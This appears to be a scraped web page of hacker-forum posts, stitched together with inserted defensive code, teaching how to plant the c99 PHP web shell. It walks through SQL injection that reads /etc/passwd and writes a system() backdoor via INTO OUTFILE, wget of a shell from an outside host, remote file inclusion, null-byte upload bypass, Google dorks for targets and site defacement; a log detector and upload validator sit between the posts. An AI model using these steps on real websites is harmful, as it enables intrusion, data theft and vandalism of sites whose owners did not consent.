C99 Shell Upload



First of all, find a website which is vulnerable to SQL injection. You can find websites by dorks or manually XD, like I have found this one.
You need 2 main things:
1) Root path of the website
2) A writable directory
If the vulnerable website doesn't show the root path then don't worry, I will tell you how to find the root path :D
And also a writable directory.
www.site.com/index.php?id=10'
I am not starting with the ABC of SQLi, hope you know the basics :D
Now we have to find the columns of the website, then the vulnerable columns. My site has 5 columns and 3 is the vulnerable column.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
Let's try to load files of the website
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
We won't need to read any of the files mentioned above, they are just to increase your knowledge :D
Now we have to check the file privilege for the current user. For this, first you have to find the current username.
Like this:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
Our current username is shown, e.g. mine is Ch3rn0by1
Now check file privileges for user Ch3rn0by1
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
If it shows Y (yes) in the vulnerable column of the website, that means we have the file privileges for the current user Ch3rn0by1.
And if it doesn't show Y, then don't waste your time there :D
OK, now we have to know the root path :D For this we have to know the software which is used on the server.
You can use Havij, etc/passwd and many more softwares (etc/passwd isn't a software LOL).
To know the server software from the file etc/passwd, use this query:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--
Now we have our server software etc. (/home/Ch3rn0by1)
Now read one more file.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
Where Ch3rn0by1 is your server software name, like servername.conf :D
Now we have the root path
/home/site.com/public_html etc.
Now we have to find a writable directory. For this you can use Google dorks as well, and your knowledge too :D
site www.site.com/dir/*/*/*/*/
So it's site.com/ch3rn0by1/writeable
Now we will upload our evil code
www.site.com/index.php?id=10 UniOn SeleCt 1,2,'<?system($_REQUEST['cmd']);?>',4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
ok now we have to execute our commands
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
Now we will use wget command to upload our evil script
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
Now we will rename our c99.txt to php in order to execute it :D
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D
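From the defender's side, every step of the walkthrough above leaves a distinctive request in the web server's access log. The following added example (not part of the original page) flags those requests and the write-then-execute sequence per client; the log lines, addresses, paths and rule names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format; addresses and paths are made up.
SAMPLE_LOG = """\
198.51.100.4 - - [12/Mar/2024:10:00:00 +0000] "GET /index.php?id=10 HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,load_file('/etc/passwd'),4,5-- HTTP/1.1" 200 6010
203.0.113.7 - - [12/Mar/2024:10:02:30 +0000] "GET /index.php?id=-10+UNION/**/SELECT+1,2,file_priv,4,5+FROM+mysql.user-- HTTP/1.1" 200 6002
203.0.113.7 - - [12/Mar/2024:10:04:11 +0000] "GET /index.php?id=10+union+select+1,2,'x',4,5+into+outfile+'/var/www/up/a.php'--+ HTTP/1.1" 200 5100
203.0.113.7 - - [12/Mar/2024:10:04:40 +0000] "GET /up/a.php?cmd=uname%20-a HTTP/1.1" 200 88
"""

# Rule names are hypothetical labels; patterns run on the decoded, lower-cased target.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "priv_probe": re.compile(r"\bfile_priv\b|\bmysql\.user\b"),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "cmd_param": re.compile(r"[?&]cmd="),  # noisy alone, strong after file_write
}
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/')

def normalize(target):
    """Undo URL encoding (twice, for double-encoding), inline comments and mixed case."""
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"/\*.*?\*/", " ", decoded).lower()

def scan(log_text):
    """Map client address -> ordered list of rule hits, one list per flagged request."""
    findings = defaultdict(list)
    for m in filter(None, map(LINE.match, log_text.splitlines())):
        target = normalize(m.group(2))
        hits = sorted(name for name, rx in RULES.items() if rx.search(target))
        if hits:
            findings[m.group(1)].append(hits)
    return dict(findings)

def write_then_execute(log_text):
    """Clients whose INTO OUTFILE request was later followed by a cmd= request."""
    flagged = []
    for client, events in scan(log_text).items():
        writes = [i for i, hits in enumerate(events) if "file_write" in hits]
        if writes and any("cmd_param" in hits for hits in events[writes[0] + 1:]):
            flagged.append(client)
    return sorted(flagged)
```

The chain only works when the database account holds the FILE privilege and the server permits writes under the web root, so revoking FILE from application accounts and restricting `secure_file_priv` removes the steps this detector looks for.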

Uploading c99 shell in bWAPP application via SQL Injection vulnerability.

Upload
The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
A remote include works like this:
A website written in PHP includes files from a local directory. It usually looks something like this in the URL: 'http://test.com/index.php?file=whatever' The part after the '?file=' is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : 'http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
Get it?
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.

Now, let's take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:\My Documents\shell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text form as '. So, back to the upload form we go. As we go to upload our shell 'C:\My Documents\shell.php' we will add to the end of that a Null Byte along with an extension. Now it looks something like this 'C:\My Documents\shell.php.jpg'

(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators' and the like)

Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.

Everyone got it now?

If all things go according to plan, your shell shall be uploaded and you can now take control.
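The post above notes that the trick fails when the server re-checks the extension and assigns the stored name itself. The following added example (not from the original post) sketches that server-side check; the function names, the allowlist and the sample inputs are assumptions made for illustration.

```python
import re
import secrets

# Allowlisted extensions and the leading bytes a real file of that type starts with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
ALIASES = {"jpeg": "jpg"}

class UploadRejected(ValueError):
    """Raised when an upload fails validation; nothing should be written to disk."""

def stored_name_for(client_name: str, content: bytes) -> str:
    """Validate an upload and return the server-chosen name to store it under."""
    # A NUL or other control character is never legitimate in a filename.
    # Reject rather than truncate, so "x.php<NUL>.jpg" cannot pass as ".jpg".
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in client_name):
        raise UploadRejected("control character in filename")
    # Drop any client-side directory part, Windows or POSIX style.
    base = re.split(r"[\\/]", client_name)[-1]
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem:
        raise UploadRejected("missing extension")
    ext = ALIASES.get(ext.lower(), ext.lower())
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # The bytes must agree with the claimed type.
    if not content.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # Never reuse client text in the stored name: random stem + verified extension.
    return f"{secrets.token_hex(16)}.{ext}"

def is_accepted(client_name: str, content: bytes) -> bool:
    """Convenience wrapper returning True/False instead of raising."""
    try:
        stored_name_for(client_name, content)
        return True
    except UploadRejected:
        return False
```

A leading-bytes check does not prove a file is harmless, so uploads should also be stored in a directory where the web server never executes scripts.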
II)
---
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving you're a good hacker. Okay so let's get started
First you need a c99 shell, which can be easily found on Google
Your antivirus might think it's a virus but it isn't! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
Quote:inurl:'upload.php'

Quote:inurl:'page=home.html'

Quote:inurl:'news/id='

That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
Quote:http://site.com/page=

On that page= you can put your shell so it would look like
Quote:http://site.com/page=http://geocities.co...13/c99.txt

credits To RiTaLiN

C99shell Upload

  • Figure 6 provides a screenshot of the c99 PHP shell running on a web server. Pre-Requisite Labs. Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14; Lab Notes. In this lab we will do the following: We will download C99.php. We will upload C99.php to the DVWA Upload screen. We will search for sensitive database files.
  • The c99 shell allows an attacker to hijack the web server process, allowing the attacker to issue commands on the server as the account under which PHP is running. The c99 shell allows an attacker to browse the filesystem, upload, view, and edit files as well as move files, delete files, and even change permissions, all as the web server.